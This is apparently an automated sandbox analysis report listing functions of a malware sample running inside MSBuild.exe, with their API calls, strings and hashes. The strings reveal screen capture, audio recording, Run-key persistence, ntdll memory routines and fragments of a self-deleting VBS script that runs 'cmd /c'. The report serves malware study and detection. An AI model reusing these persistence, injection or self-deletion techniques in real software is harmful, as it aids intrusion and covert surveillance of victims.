                                                                                                                                            • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                                                                                                            • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                                            • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                                                                                                            Function 00417F9F Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                                              • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                                                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                                                            • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                                                            • GetCursorInfo.USER32(?), ref: 004180B5
                                                                                                                                            • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                                                            • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                                                            • DeleteObject.GDI32(?), ref: 00418107
                                                                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                                            • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                                            • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                                                            • DeleteDC.GDI32(?), ref: 00418398
                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                                                            • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                                                                                                            • String ID: DISPLAY
                                                                                                                                            • API String ID: 1352755160-865373369
                                                                                                                                            • Opcode ID: 22c96b6163cb50d8b2a0e7298f69cab473e7aa59f92580ce48d75f9de49cebd4
                                                                                                                                            • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                                            • Opcode Fuzzy Hash: 22c96b6163cb50d8b2a0e7298f69cab473e7aa59f92580ce48d75f9de49cebd4
                                                                                                                                            • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                                            Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                              • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                            • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                                            • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                                            • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                                            • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                                              • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                                              • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                                              • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                                            • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                                            • API String ID: 4250697656-2665858469
                                                                                                                                            • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                                            • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                                            • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                                            • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                                            Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                              • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C63E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                            • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                                                                            • API String ID: 1861856835-3168347843
                                                                                                                                            • Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                                                            • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                                                                                                            • Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
                                                                                                                                            • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                                                                                                            Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                              • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                                                            • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                                                              • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                                                              • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                                                              • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76E23530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                            • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                                                            • API String ID: 3797177996-1998216422
                                                                                                                                            • Opcode ID: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                                                                            • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                                                            • Opcode Fuzzy Hash: 54639b7d9ee10e7a81b53f3e46565cc10b582b28373b0b397b468ca4c2ae59ea
                                                                                                                                            • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                                                                                                            Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                                                                                                            • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                                                                                                            • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                                                                                                            • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                                                                                                            • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                                                                                                            • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                                                                                                            • SetEvent.KERNEL32 ref: 0041A38A
                                                                                                                                            • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                                                                                                            • CloseHandle.KERNEL32 ref: 0041A3AB
                                                                                                                                            • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                                                                                                            • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                            • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                                                                                                            • API String ID: 738084811-1408154895
                                                                                                                                            • Opcode ID: 512388ae3893cad5346b6d93e57f113ab9ba600bb7157453820f8d4955eb17cd
                                                                                                                                            • Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
                                                                                                                                            • Opcode Fuzzy Hash: 512388ae3893cad5346b6d93e57f113ab9ba600bb7157453820f8d4955eb17cd
                                                                                                                                            • Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF
                                                                                                                                            Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                            • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
                                                                                                                                            • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
                                                                                                                                            • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
                                                                                                                                            • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                                                            • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                                                            • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$Write$Create
                                                                                                                                            • String ID: RIFF$WAVE$data$fmt
                                                                                                                                            • API String ID: 1602526932-4212202414
                                                                                                                                            • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                            • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                                                            • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                                                            • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                                                            Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                            • API String ID: 1646373207-89630625
                                                                                                                                            • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                            • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                                                            • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                                                            • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                                                            Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _wcslen.LIBCMT ref: 0040BC75
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                                                            • _wcslen.LIBCMT ref: 0040BD54
                                                                                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                                                            • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe,00000000,00000000), ref: 0040BDF2
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                                                            • _wcslen.LIBCMT ref: 0040BE34
                                                                                                                                            • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                                                            • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                            • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$del$open$BG$BG
                                                                                                                                            • API String ID: 1579085052-1088133900
                                                                                                                                            • Opcode ID: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                                                                            • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                                                            • Opcode Fuzzy Hash: dc10b710cf19d5e546024f9218f411ba7f3a987ff1f587e32df4140d18237521
                                                                                                                                            • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                                                            Function 1000173A Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 210COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10001CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                                                              • Part of subcall function 10001CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                                                              • Part of subcall function 10001CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                            • _strlen.LIBCMT ref: 10001855
                                                                                                                                            • _strlen.LIBCMT ref: 10001869
                                                                                                                                            • _strlen.LIBCMT ref: 1000188B
                                                                                                                                            • _strlen.LIBCMT ref: 100018AE
                                                                                                                                            • _strlen.LIBCMT ref: 100018C8
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strlen$File$CopyCreateDelete
